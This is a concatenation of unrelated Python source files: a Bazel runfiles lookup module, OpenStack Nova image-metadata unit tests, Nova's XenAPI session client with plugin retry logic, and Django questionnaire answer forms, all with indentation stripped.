"""Returns the runtime location of runfiles.
Runfiles are data-dependencies of Bazel-built binaries and tests.
"""
def __init__(self, strategy):
self._strategy = strategy
def Rlocation(self, path):
"""Returns the runtime path of a runfile.
Runfiles are data-dependencies of Bazel-built binaries and tests.
The returned path may not be valid. The caller should check the path's
validity and that the path exists.
The function may return None. In that case the caller can be sure that the
rule does not know about this data-dependency.
Args:
path: string; runfiles-root-relative path of the runfile
Returns:
the path to the runfile, which the caller should check for existence, or
None if the method doesn't know about this runfile
Raises:
TypeError: if `path` is not a string
ValueError: if `path` is None or empty, or it's absolute or not normalized
"""
if not path:
raise ValueError()
if not isinstance(path, str):
raise TypeError()
if (
path.startswith("../")
or "/.." in path
or path.startswith("./")
or "/./" in path
or path.endswith("/.")
or "//" in path
):
raise ValueError('path is not normalized: "%s"' % path)
if path[0] == "\\":
raise ValueError('path is absolute without a drive letter: "%s"' % path)
if os.path.isabs(path):
return path
return self._strategy.RlocationChecked(path)
def EnvVars(self):
"""Returns environment variables for subprocesses.
The caller should set the returned key-value pairs in the environment of
subprocesses in case those subprocesses are also Bazel-built binaries that
need to use runfiles.
Returns:
{string: string}; a dict; keys are environment variable names, values are
the values for these environment variables
"""
return self._strategy.EnvVars()
class _ManifestBased(object):
"""`Runfiles` strategy that parses a runfiles-manifest to look up runfiles."""
def __init__(self, path):
if not path:
raise ValueError()
if not isinstance(path, str):
raise TypeError()
self._path = path
self._runfiles = _ManifestBased._LoadRunfiles(path)
def RlocationChecked(self, path):
return self._runfiles.get(path)
@staticmethod
def _LoadRunfiles(path):
"""Loads the runfiles manifest."""
result = {}
with open(path, "r") as f:
for line in f:
line = line.strip()
if line:
tokens = line.split(" ", 1)
if len(tokens) == 1:
result[line] = line
else:
result[tokens[0]] = tokens[1]
return result
def _GetRunfilesDir(self):
if self._path.endswith("/MANIFEST") or self._path.endswith("\\MANIFEST"):
return self._path[: -len("/MANIFEST")]
elif self._path.endswith(".runfiles_manifest"):
return self._path[: -len("_manifest")]
else:
return ""
def EnvVars(self):
directory = self._GetRunfilesDir()
return {
"RUNFILES_MANIFEST_FILE": self._path,
"RUNFILES_DIR": directory,
# TODO(laszlocsomor): remove JAVA_RUNFILES once the Java launcher can
# pick up RUNFILES_DIR.
"JAVA_RUNFILES": directory,
}
class _DirectoryBased(object):
"""`Runfiles` strategy that appends runfiles paths to the runfiles root."""
def __init__(self, path):
if not path:
raise ValueError()
if not isinstance(path, str):
raise TypeError()
self._runfiles_root = path
def RlocationChecked(self, path):
# Use posixpath instead of os.path, because Bazel only creates a runfiles
# tree on Unix platforms, so `Create()` will only create a directory-based
# runfiles strategy on those platforms.
return posixpath.join(self._runfiles_root, path)
def EnvVars(self):
return {
"RUNFILES_DIR": self._runfiles_root,
# TODO(laszlocsomor): remove JAVA_RUNFILES once the Java launcher can
# pick up RUNFILES_DIR.
"JAVA_RUNFILES": self._runfiles_root,
}
def _PathsFrom(
argv0, runfiles_mf, runfiles_dir, is_runfiles_manifest, is_runfiles_directory
):
"""Discover runfiles manifest and runfiles directory paths.
Args:
argv0: string; the value of sys.argv[0]
runfiles_mf: string; the value of the RUNFILES_MANIFEST_FILE environment
variable
runfiles_dir: string; the value of the RUNFILES_DIR environment variable
is_runfiles_manifest: lambda(string):bool; returns true if the argument is
the path of a runfiles manifest file
is_runfiles_directory: lambda(string):bool; returns true if the argument is
the path of a runfiles directory
Returns:
(string, string) pair, first element is the path to the runfiles manifest,
second element is the path to the runfiles directory. If the first element
is non-empty, then is_runfiles_manifest returns true for it. Same goes for
the second element and is_runfiles_directory respectively. If both elements
are empty, then this function could not find a manifest or directory for
which is_runfiles_manifest or is_runfiles_directory returns true.
"""
mf_valid = is_runfiles_manifest(runfiles_mf)
dir_valid = is_runfiles_directory(runfiles_dir)
if not mf_valid and not dir_valid:
runfiles_mf = argv0 + ".runfiles/MANIFEST"
runfiles_dir = argv0 + ".runfiles"
mf_valid = is_runfiles_manifest(runfiles_mf)
dir_valid = is_runfiles_directory(runfiles_dir)
if not mf_valid:
runfiles_mf = argv0 + ".runfiles_manifest"
mf_valid = is_runfiles_manifest(runfiles_mf)
if not mf_valid and not dir_valid:
return ("", "")
if not mf_valid:
runfiles_mf = runfiles_dir + "/MANIFEST"
mf_valid = is_runfiles_manifest(runfiles_mf)
if not mf_valid:
runfiles_mf = runfiles_dir + "_manifest"
mf_valid = is_runfiles_manifest(runfiles_mf)
if not dir_valid:
runfiles_dir = runfiles_mf[:-9]  # "_manifest" or "/MANIFEST"
dir_valid = is_runfiles_directory(runfiles_dir)
return (runfiles_mf if mf_valid else "", runfiles_dir if dir_valid else "")
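# Editor's note on the discovery order above: for argv0 == "foo/bar", when
# neither environment variable points at a valid location, the candidates
# tried are "foo/bar.runfiles/MANIFEST", "foo/bar.runfiles" (as a directory)
# and "foo/bar.runfiles_manifest"; whichever of manifest/directory is found
# is then used to derive the other.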
|
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from oslo_serialization import jsonutils
import webob
from nova.api.openstack.compute import image_metadata as image_metadata_v21
from nova.api.openstack.compute.legacy_v2 import image_metadata
from nova import exception
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import image_fixtures
IMAGE_FIXTURES = image_fixtures.get_image_fixtures()
CHK_QUOTA_STR = 'nova.api.openstack.common.check_img_metadata_properties_quota'
def get_image_123():
return copy.deepcopy(IMAGE_FIXTURES)[0]
class ImageMetaDataTestV21(test.NoDBTestCase):
controller_class = image_metadata_v21.ImageMetadataController
invalid_request = exception.ValidationError
def setUp(self):
super(ImageMetaDataTestV21, self).setUp()
self.controller = self.controller_class()
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_index(self, get_all_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata')
res_dict = self.controller.index(req, '123')
expected = {'metadata': {'key1': 'value1'}}
self.assertEqual(res_dict, expected)
get_all_mocked.assert_called_once_with(mock.ANY, '123')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_show(self, get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
res_dict = self.controller.show(req, '123', 'key1')
self.assertIn('meta', res_dict)
self.assertEqual(len(res_dict['meta']), 1)
self.assertEqual('value1', res_dict['meta']['key1'])
get_mocked.assert_called_once_with(mock.ANY, '123')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_show_not_found(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key9')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, '123', 'key9')
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_show_image_not_found(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata/key1')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, '100', 'key9')
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_create(self, get_mocked, update_mocked, quota_mocked):
mock_result = copy.deepcopy(get_image_123())
mock_result['properties']['key7'] = 'value7'
update_mocked.return_value = mock_result
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata')
req.method = 'POST'
body = {"metadata": {"key7": "value7"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res = self.controller.create(req, '123', body=body)
get_mocked.assert_called_once_with(mock.ANY, '123')
expected = copy.deepcopy(get_image_123())
expected['properties'] = {
'key1': 'value1', # existing meta
'key7': 'value7' # new meta
}
quota_mocked.assert_called_once_with(mock.ANY, expected["properties"])
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
expected_output = {'metadata': {'key1': 'value1', 'key7': 'value7'}}
self.assertEqual(expected_output, res)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_create_image_not_found(self, _get_mocked, update_mocked,
quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata')
req.method = 'POST'
body = {"metadata": {"key7": "value7"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, '100', body=body)
self.assertFalse(quota_mocked.called)
self.assertFalse(update_mocked.called)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_update_all(self, get_mocked, update_mocked, quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata')
req.method = 'PUT'
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res = self.controller.update_all(req, '123', body=body)
get_mocked.assert_called_once_with(mock.ANY, '123')
expected = copy.deepcopy(get_image_123())
expected['properties'] = {
'key9': 'value9' # replace meta
}
quota_mocked.assert_called_once_with(mock.ANY, expected["properties"])
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
expected_output = {'metadata': {'key9': 'value9'}}
self.assertEqual(expected_output, res)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_update_all_image_not_found(self, _get_mocked, quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata')
req.method = 'PUT'
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body=body)
self.assertFalse(quota_mocked.called)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_update_item(self, _get_mocked, update_mocked, quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "zz"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res = self.controller.update(req, '123', 'key1', body=body)
expected = copy.deepcopy(get_image_123())
expected['properties'] = {
'key1': 'zz' # changed meta
}
quota_mocked.assert_called_once_with(mock.ANY, expected["properties"])
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
expected_output = {'meta': {'key1': 'zz'}}
self.assertEqual(res, expected_output)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_update_item_image_not_found(self, _get_mocked, quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "zz"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, '100', 'key1',
body=body)
self.assertFalse(quota_mocked.called)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get')
def test_update_item_bad_body(self, get_mocked, update_mocked,
quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'PUT'
body = {"key1": "zz"}
req.body = ''
req.headers["content-type"] = "application/json"
self.assertRaises(self.invalid_request,
self.controller.update, req, '123', 'key1',
body=body)
self.assertFalse(get_mocked.called)
self.assertFalse(quota_mocked.called)
self.assertFalse(update_mocked.called)
@mock.patch(CHK_QUOTA_STR,
side_effect=webob.exc.HTTPRequestEntityTooLarge(
explanation='', headers={'Retry-After': 0}))
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get')
def test_update_item_too_many_keys(self, get_mocked, update_mocked,
_quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'PUT'
body = {"meta": {"foo": "bar"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, '123', 'key1',
body=body)
self.assertFalse(get_mocked.called)
self.assertFalse(update_mocked.called)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_update_item_body_uri_mismatch(self, _get_mocked, update_mocked,
quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, '123', 'bad',
body=body)
self.assertFalse(quota_mocked.called)
self.assertFalse(update_mocked.called)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_delete(self, _get_mocked, update_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'DELETE'
res = self.controller.delete(req, '123', 'key1')
expected = copy.deepcopy(get_image_123())
expected['properties'] = {}
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
self.assertIsNone(res)
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_delete_not_found(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/blah')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, '123', 'blah')
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_delete_image_not_found(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, '100', 'key1')
@mock.patch(CHK_QUOTA_STR,
side_effect=webob.exc.HTTPForbidden(
explanation='', headers={'Retry-After': 0}))
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_too_many_metadata_items_on_create(self, _get_mocked,
update_mocked, _quota_mocked):
body = {"metadata": {"foo": "bar"}}
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.create, req, '123', body=body)
self.assertFalse(update_mocked.called)
@mock.patch(CHK_QUOTA_STR,
side_effect=webob.exc.HTTPForbidden(
explanation='', headers={'Retry-After': 0}))
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_too_many_metadata_items_on_put(self, _get_mocked,
update_mocked, _quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/blah')
req.method = 'PUT'
body = {"meta": {"blah": "blah", "blah1": "blah1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.invalid_request,
self.controller.update, req, '123', 'blah',
body=body)
self.assertFalse(update_mocked.called)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotAuthorized(image_id='123'))
def test_image_not_authorized_update(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.update, req, '123', 'key1',
body=body)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotAuthorized(image_id='123'))
def test_image_not_authorized_update_all(self, _get_mocked):
image_id = 131
# see nova.tests.unit.api.openstack.fakes:_make_image_fixtures
req = fakes.HTTPRequest.blank('/v2/fake/images/%s/metadata/key1'
% image_id)
req.method = 'PUT'
body = {"metadata": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.update_all, req, image_id,
body=body)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotAuthorized(image_id='123'))
def test_image_not_authorized_create(self, _get_mocked):
image_id = 131
# see nova.tests.unit.api.openstack.fakes:_make_image_fixtures
req = fakes.HTTPRequest.blank('/v2/fake/images/%s/metadata/key1'
% image_id)
req.method = 'POST'
body = {"metadata": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.create, req, image_id,
body=body)
class ImageMetaDataTestV2(ImageMetaDataTestV21):
controller_class = image_metadata.Controller
invalid_request = webob.exc.HTTPBadRequest
# NOTE(cyeoh): This duplicate unittest is necessary because of a race
# condition with the V21 unittests. It's a mock issue.
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_delete(self, _get_mocked, update_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'DELETE'
res = self.controller.delete(req, '123', 'key1')
expected = copy.deepcopy(get_image_123())
expected['properties'] = {}
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
self.assertIsNone(res)
|
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import contextlib
try:
import cPickle as pickle
except ImportError:
import pickle
import errno
import socket
import time
from eventlet import queue
from eventlet import timeout
from oslo_log import log as logging
from oslo_utils import versionutils
from six.moves import http_client
from six.moves import range
from six.moves import urllib
try:
import xmlrpclib
except ImportError:
import six.moves.xmlrpc_client as xmlrpclib
import nova.conf
from nova import context
from nova import exception
from nova.i18n import _, _LE, _LW
from nova import objects
from nova import version
from nova.virt.xenapi.client import objects as cli_objects
from nova.virt.xenapi import pool
from nova.virt.xenapi import pool_states
LOG = logging.getLogger(__name__)
CONF = nova.conf.CONF
def apply_session_helpers(session):
session.VM = cli_objects.VM(session)
session.SR = cli_objects.SR(session)
session.VDI = cli_objects.VDI(session)
session.VIF = cli_objects.VIF(session)
session.VBD = cli_objects.VBD(session)
session.PBD = cli_objects.PBD(session)
session.PIF = cli_objects.PIF(session)
session.VLAN = cli_objects.VLAN(session)
session.host = cli_objects.Host(session)
session.network = cli_objects.Network(session)
session.pool = cli_objects.Pool(session)
class XenAPISession(object):
"""The session to invoke XenAPI SDK calls."""
# This is not a config option as it should only ever be
# changed in development environments.
# MAJOR VERSION: Incompatible changes with the plugins
# MINOR VERSION: Compatible changes, new plugins, etc
PLUGIN_REQUIRED_VERSION = '1.8'
def __init__(self, url, user, pw):
version_string = version.version_string_with_package()
self.nova_version = ('%(vendor)s %(product)s %(version)s' %
{'vendor': version.vendor_string(),
'product': version.product_string(),
'version': version_string})
import XenAPI
self.XenAPI = XenAPI
self._sessions = queue.Queue()
self.is_slave = False
self.host_checked = False
exception = self.XenAPI.Failure(_("Unable to log in to XenAPI "
"(is the Dom0 disk full?)"))
self.url = self._create_first_session(url, user, pw, exception)
self._populate_session_pool(url, user, pw, exception)
self.host_uuid = self._get_host_uuid()
self.host_ref = self._get_host_ref()
self.product_version, self.product_brand = \
self._get_product_version_and_brand()
self._verify_plugin_version()
apply_session_helpers(self)
def _login_with_password(self, user, pw, session, exception):
with timeout.Timeout(CONF.xenserver.login_timeout, exception):
session.login_with_password(user, pw,
self.nova_version, 'OpenStack')
def _verify_plugin_version(self):
requested_version = self.PLUGIN_REQUIRED_VERSION
current_version = self.call_plugin_serialized(
'nova_plugin_version.py', 'get_version')
# v2.0 is the same as v1.8, with no version bumps. Remove this once
# Ocata is released
if requested_version == '2.0' and current_version == '1.8':
return
if not versionutils.is_compatible(requested_version, current_version):
raise self.XenAPI.Failure(
_("Plugin version mismatch (Expected %(exp)s, got %(got)s)") %
{'exp': requested_version, 'got': current_version})
def _create_first_session(self, url, user, pw, exception):
try:
session = self._create_session_and_login(url, user, pw, exception)
except self.XenAPI.Failure as e:
# if user and pw of the master are different, we're doomed!
if e.details[0] == 'HOST_IS_SLAVE':
master = e.details[1]
url = pool.swap_xapi_host(url, master)
session = self._create_session_and_login(url, user, pw,
exception)
self.is_slave = True
else:
raise
self._sessions.put(session)
return url
def _populate_session_pool(self, url, user, pw, exception):
for i in range(CONF.xenserver.connection_concurrent - 1):
session = self._create_session_and_login(url, user, pw, exception)
self._sessions.put(session)
def _get_host_uuid(self):
if self.is_slave:
aggr = objects.AggregateList.get_by_host(
context.get_admin_context(),
CONF.host, key=pool_states.POOL_FLAG)[0]
if not aggr:
LOG.error(_LE('Host is member of a pool, but DB '
'says otherwise'))
raise exception.AggregateHostNotFound()
return aggr.metadata[CONF.host]
else:
with self._get_session() as session:
host_ref = session.xenapi.session.get_this_host(session.handle)
return session.xenapi.host.get_uuid(host_ref)
def _get_product_version_and_brand(self):
"""Return a tuple of (major, minor, rev) for the host version and
a string of the product brand.
"""
software_version = self._get_software_version()
product_version_str = software_version.get('product_version')
# Product version is only set in some cases (e.g. XCP, XenServer) and
# not in others (e.g. xenserver-core, XAPI-XCP).
# In these cases, the platform version is the best number to use.
if product_version_str is None:
product_version_str = software_version.get('platform_version',
'0.0.0')
product_brand = software_version.get('product_brand')
product_version = versionutils.convert_version_to_tuple(
product_version_str)
return product_version, product_brand
def _get_software_version(self):
return self.call_xenapi('host.get_software_version', self.host_ref)
def get_session_id(self):
"""Return a string session_id. Used for vnc consoles."""
with self._get_session() as session:
return str(session._session)
@contextlib.contextmanager
def _get_session(self):
"""Return exclusive session for scope of with statement."""
session = self._sessions.get()
try:
yield session
finally:
self._sessions.put(session)
def _get_host_ref(self):
"""Return the xenapi host on which nova-compute runs on."""
with self._get_session() as session:
return session.xenapi.host.get_by_uuid(self.host_uuid)
def call_xenapi(self, method, *args):
"""Call the specified XenAPI method on a background thread."""
with self._get_session() as session:
return session.xenapi_request(method, args)
def call_plugin(self, plugin, fn, args):
"""Call host.call_plugin on a background thread."""
# NOTE(armando): pass the host uuid along with the args so that
# the plugin gets executed on the right host when using XS pools
args['host_uuid'] = self.host_uuid
# TODO(sfinucan): Once the required plugin version is bumped to v2.0,
# we can assume that all files will have a '.py' extension. Until then,
# handle hosts without this extension by rewriting all calls to plugins
# to exclude the '.py' extension. This is made possible through the
# temporary inclusion of symlinks to plugins.
# NOTE(sfinucan): 'partition_utils.py' was the only plugin with a '.py'
# extension before this change was enacted, hence this plugin is
# excluded
# NOTE: str.rstrip strips a set of characters rather than a suffix, so
# rstrip('.py') could mangle plugin names; strip the extension explicitly.
if plugin != 'partition_utils.py' and plugin.endswith('.py'):
plugin = plugin[:-len('.py')]
with self._get_session() as session:
return self._unwrap_plugin_exceptions(
session.xenapi.host.call_plugin,
self.host_ref, plugin, fn, args)
def call_plugin_serialized(self, plugin, fn, *args, **kwargs):
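# XenAPI plugin arguments must be a flat map of strings, so the real
# args/kwargs are pickled into a single 'params' entry; the plugin is
# expected to return a pickled value, which is unpickled below.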
params = {'params': pickle.dumps(dict(args=args, kwargs=kwargs))}
rv = self.call_plugin(plugin, fn, params)
return pickle.loads(rv)
def call_plugin_serialized_with_retry(self, plugin, fn, num_retries,
callback, retry_cb=None, *args,
**kwargs):
"""Allows a plugin to raise RetryableError so we can try again."""
attempts = num_retries + 1
sleep_time = 0.5
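# Back-off schedule: sleep 0.5s before the second attempt, doubling on
# each subsequent retry (1s, 2s, 4s, ...) and capped at 15s.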
for attempt in range(1, attempts + 1):
try:
if attempt > 1:
time.sleep(sleep_time)
sleep_time = min(2 * sleep_time, 15)
callback_result = None
if callback:
callback_result = callback(kwargs)
msg = ('%(plugin)s.%(fn)s attempt %(attempt)d/%(attempts)d, '
'callback_result: %(callback_result)s')
LOG.debug(msg,
{'plugin': plugin, 'fn': fn, 'attempt': attempt,
'attempts': attempts,
'callback_result': callback_result})
return self.call_plugin_serialized(plugin, fn, *args, **kwargs)
except self.XenAPI.Failure as exc:
if self._is_retryable_exception(exc, fn):
LOG.warning(_LW('%(plugin)s.%(fn)s failed. '
'Retrying call.'),
{'plugin': plugin, 'fn': fn})
if retry_cb:
retry_cb(exc=exc)
else:
raise
except socket.error as exc:
if exc.errno == errno.ECONNRESET:
LOG.warning(_LW('Lost connection to XenAPI during call to '
'%(plugin)s.%(fn)s. Retrying call.'),
{'plugin': plugin, 'fn': fn})
if retry_cb:
retry_cb(exc=exc)
else:
raise
raise exception.PluginRetriesExceeded(num_retries=num_retries)
def _is_retryable_exception(self, exc, fn):
_type, method, error = exc.details[:3]
if error == 'RetryableError':
LOG.debug("RetryableError, so retrying %(fn)s", {'fn': fn},
exc_info=True)
return True
elif "signal" in method:
LOG.debug("Error due to a signal, retrying %(fn)s", {'fn': fn},
exc_info=True)
return True
else:
return False
def _create_session(self, url):
"""Stubout point. This can be replaced with a mock session."""
self.is_local_connection = url == "unix://local"
if self.is_local_connection:
return self.XenAPI.xapi_local()
return self.XenAPI.Session(url)
def _create_session_and_login(self, url, user, pw, exception):
session = self._create_session(url)
self._login_with_password(user, pw, session, exception)
return session
def _unwrap_plugin_exceptions(self, func, *args, **kwargs):
"""Parse exception details."""
try:
return func(*args, **kwargs)
except self.XenAPI.Failure as exc:
LOG.debug("Got exception: %s", exc)
if (len(exc.details) == 4 and
exc.details[0] == 'XENAPI_PLUGIN_EXCEPTION' and
exc.details[2] == 'Failure'):
params = None
try:
params = ast.literal_eval(exc.details[3])
except Exception:
raise exc
raise self.XenAPI.Failure(params)
else:
raise
except xmlrpclib.ProtocolError as exc:
LOG.debug("Got exception: %s", exc)
raise
def get_rec(self, record_type, ref):
try:
return self.call_xenapi('%s.get_record' % record_type, ref)
except self.XenAPI.Failure as e:
if e.details[0] != 'HANDLE_INVALID':
raise
return None
def get_all_refs_and_recs(self, record_type):
"""Retrieve all refs and recs for a Xen record type.
Handles race-conditions where the record may be deleted between
the `get_all` call and the `get_record` call.
"""
return self.call_xenapi('%s.get_all_records' % record_type).items()
@contextlib.contextmanager
def custom_task(self, label, desc=''):
"""Create a XenAPI task for the scope of the with statement and
destroy it on exit.
"""
name = 'nova-%s' % label
task_ref = self.call_xenapi("task.create", name,
desc)
try:
LOG.debug('Created task %s with ref %s', name, task_ref)
yield task_ref
finally:
self.call_xenapi("task.destroy", task_ref)
LOG.debug('Destroyed task ref %s', task_ref)
@contextlib.contextmanager
def http_connection(session):
conn = None
xs_url = urllib.parse.urlparse(session.url)
LOG.debug("Creating http(s) connection to %s" % session.url)
if xs_url.scheme == 'http':
conn = http_client.HTTPConnection(xs_url.netloc)
elif xs_url.scheme == 'https':
conn = http_client.HTTPSConnection(xs_url.netloc)
conn.connect()
try:
yield conn
finally:
conn.close()
|
|
import copy
from django import forms
from django.forms.util import ErrorDict
from django.forms import ModelForm, ModelChoiceField
from questionnaire.forms.custom_widgets import MultiChoiceAnswerSelectWidget, SkipRuleRadioWidget, MultipleResponseChoiceField
from questionnaire.models import NumericalAnswer, TextAnswer, DateAnswer, MultiChoiceAnswer, QuestionOption
from questionnaire.models.answers import MultipleResponseAnswer
from questionnaire.utils.answer_type import AnswerTypes
from questionnaire.utils.model_utils import number_from
class AnswerForm(ModelForm):
def __init__(self, *args, **kwargs):
super(AnswerForm, self).__init__(*args, **kwargs)
self.question = self._get_question(kwargs)
self.fields['response'].required = self.question.is_required
self._initial = self._set_initial(kwargs)
self.is_editing = False
self._set_instance()
self.question_group = self._initial['group'] if self._initial else None
self.fields['response'].widget.attrs.update({'class': 'input-question-id-%s' % self.question.id})
def _set_initial(self, kwargs):
initial = kwargs['initial'] if 'initial' in kwargs else {}
if self.data and 'response' in self.data:
if 'response' in initial.keys():
del initial['response']
return initial
def _set_instance(self):
if 'answer' in self._initial:
self.is_editing = True
self.instance = self._initial['answer']
def show_is_required_errors(self):
if self.question.is_required and not self.data and not self._initial.get('response', None):
self._errors = self._errors or ErrorDict()
self._errors['response'] = self.error_class(['This field is required.'])
def save(self, commit=True, *args, **kwargs):
if self.is_editing:
return super(AnswerForm, self).save(commit=commit, *args, **kwargs)
return self._create_new_answer(*args, **kwargs)
def _create_new_answer(self, *args, **kwargs):
answer = super(AnswerForm, self).save(commit=False, *args, **kwargs)
self._add_extra_attributes_to(answer)
answer.save()
return answer
def _add_extra_attributes_to(self, answer):
for attribute in self._initial.keys():
setattr(answer, attribute, self._initial[attribute])
def _get_question(self, kwargs):
return kwargs['initial'].get('question', None)
class NumericalAnswerForm(AnswerForm):
ZERO = '0'
NR = 'NR'
ND = 'ND'
class Meta:
model = NumericalAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire', 'old_response')
def clean(self):
self._clean_response()
return super(NumericalAnswerForm, self).clean()
def _clean_response(self):
response = self.cleaned_data.get('response', '').strip()
a_valid_number = number_from(response)
if response and not (response == self.ZERO or response == self.NR or response == self.ND or a_valid_number):
self._errors['response'] = self.error_class(['Enter a number, or either NR or ND if this question is irrelevant'])
elif a_valid_number and self._violates_integer_sub_type(a_valid_number):
self._errors['response'] = self.error_class(["Response should be a whole number."])
def _violates_integer_sub_type(self, num):
return AnswerTypes.is_integer(self.question.answer_sub_type) and not float(num).is_integer()
